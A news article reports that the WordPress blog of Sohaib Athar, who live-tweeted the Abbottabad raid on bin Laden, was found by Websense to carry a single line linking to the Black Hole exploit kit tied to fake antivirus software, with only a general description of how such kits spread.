The blog run by the man who first tweeted the raid on Osama bin Laden's compound was infected by an exploit kit, according to researchers at Websense.
The blog, Reallyvirtual, is written by Sohaib Athar, a 33-year-old software consultant living in Abbottabad, the town two hours north of Islamabad where bin Laden was found and killed. Since the exploit kit was discovered he has removed it.
Patrik Runald, Senior Manager, Security Research at Websense, said the exploit kit was linked by only a single line of code. The exploit, called Black Hole, is not itself malware or a virus. Rather, it checks a web site for one of about 10 known vulnerabilities, and if it finds one, it can act as an avenue for malware, viruses or Trojans.
Runald said this exploit kit was connected to a piece of fake anti-virus software that asks users to pay for repair of their systems, even though there are no problems. Such programs are called drive by downloads.
How the exploit kit got onto the blog isn't clear, Runald said. Athar is using an old version of Wordpress as a platform for the blog, but the code might have been inserted in a SQL attack, via the plug-ins (such as the link to Twitter) or even at the level of the hosting provider. Any blog could get infected and the blog owner would likely never know. It just shows how close most people are to malware, he said.
Wordpress is a popular platform, so it is a common target for attack, Runald said. He added that the Black Hole exploit kit is a relatively new piece of software, having only been spotted in the wild several months ago.
Athar said in his tweets that he had seen helicopters in the area and that he was awake at 1 a.m. local time because of the noise. A few minutes later he tweeted, A huge window shaking bang here in Abbottabad Cantt. I hope its not the start of something nasty :-S